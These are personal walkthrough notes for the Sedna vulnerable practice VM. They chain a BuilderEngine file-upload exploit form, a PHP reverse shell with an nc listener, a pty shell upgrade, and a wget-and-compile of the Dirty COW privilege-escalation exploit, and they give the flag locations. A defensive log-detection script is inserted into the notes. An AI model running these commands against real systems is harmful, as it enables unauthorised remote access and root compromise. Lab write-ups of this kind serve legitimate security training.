These are my notes from running through the Sedna vulnerable VM.

Run Burp's Discover Content feature to map out the application. You can also run Nikto to look for known vulnerabilities.

Observe /license.txt - it reveals that the target web application is running BuilderEngine.

Search for an exploit we can use:

searchsploit builderengine

View the source for the exploit:

searchsploit -x 40390

Copy the exploit code into exploit.html:

<html>
  <body>
    <form
      method="post"
      action="http://<vulnerable ip>/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
      enctype="multipart/form-data"
    >
      <input type="file" name="files[]" />
      <input type="submit" value="send" />
    </form>
  </body>
</html>

Host it:

python -m SimpleHTTPServer 8000 # make sure exploit.html is in this directory

In a web browser: http://127.0.0.1:8000/exploit.html

Modify the Laudanum backdoor (php-reverse-shell.php) so it connects back to our attacker machine's IP address and whichever port we choose to listen on. We can get this from here.

Upload laudanum backdoor through exploit.html:

Click Choose File, select php-reverse-shell.php, then click send.

Start a listener on the attacker machine, on the same port configured in the backdoor:

nc -lvp 8888

Initiate connection:

http://<vulnerable ip>/files/php-reverse-shell.php
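As an added defensive example (not part of the original notes or of the exploit), here is a small Python check over constructed Apache access-log lines that flags the chain just described: a POST to the jquery-file-upload handler, followed by a request for a PHP file under /files/ from the same client. The log lines and IP addresses are made up for the example.

```python
import re

# Constructed sample Apache combined-format log lines mirroring the upload
# endpoint and the later request to the uploaded file described in the notes.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2017:10:01:02 +0000] "GET /license.txt HTTP/1.1" 200 1123 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2017:10:02:15 +0000] "POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/ HTTP/1.1" 200 312 "http://127.0.0.1:8000/exploit.html" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2017:10:02:40 +0000] "GET /files/php-reverse-shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2017:10:03:01 +0000] "GET /files/logo.png HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: client, timestamp, request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# The upload handler path from the notes; a server-side script under /files/ afterwards is the tell.
UPLOAD_ENDPOINT = "/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
SCRIPT_EXT = re.compile(r"\.(php|phtml|php\d)$", re.IGNORECASE)


def parse_log(text):
    """Return one dict per well-formed combined-format log line."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def find_upload_then_exec(text):
    """Flag clients that POST to the upload handler and later fetch a
    script under /files/ (the upload-then-execute chain in these notes)."""
    events = parse_log(text)
    uploaders = {e["ip"] for e in events
                 if e["method"] == "POST" and e["path"] == UPLOAD_ENDPOINT}
    alerts = []
    for e in events:
        if (e["method"] == "GET" and e["path"].startswith("/files/")
                and SCRIPT_EXT.search(e["path"]) and e["ip"] in uploaders):
            alerts.append({"ip": e["ip"], "path": e["path"], "ts": e["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in find_upload_then_exec(SAMPLE_LOG):
        print("ALERT: script executed after upload:", alert)
```

A cross-origin Referer on the POST (here the attacker-hosted exploit.html) is a second signal worth alerting on in the same log.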

After getting the reverse shell:

python -c 'import pty;pty.spawn("/bin/bash")' # get real shell

To elevate our privileges, we’ll use Dirty COW (dirtyc0w). Get it and compile it:

cd /tmp && wget https://www.exploit-db.com/download/40839 && mv 40839 40839.c && gcc -pthread -o dirty 40839.c -lcrypt

Run it:

./dirty nicepassword

Access the system:

ssh firefart@192.168.1.182

For stability, run this immediately once you’re in:

echo 0 > /proc/sys/vm/dirty_writeback_centisecs

The flags can be found in:

  • /var/www/flag.txt

  • /root/flag.txt

  • /etc/tomcat7/tomcat-users.xml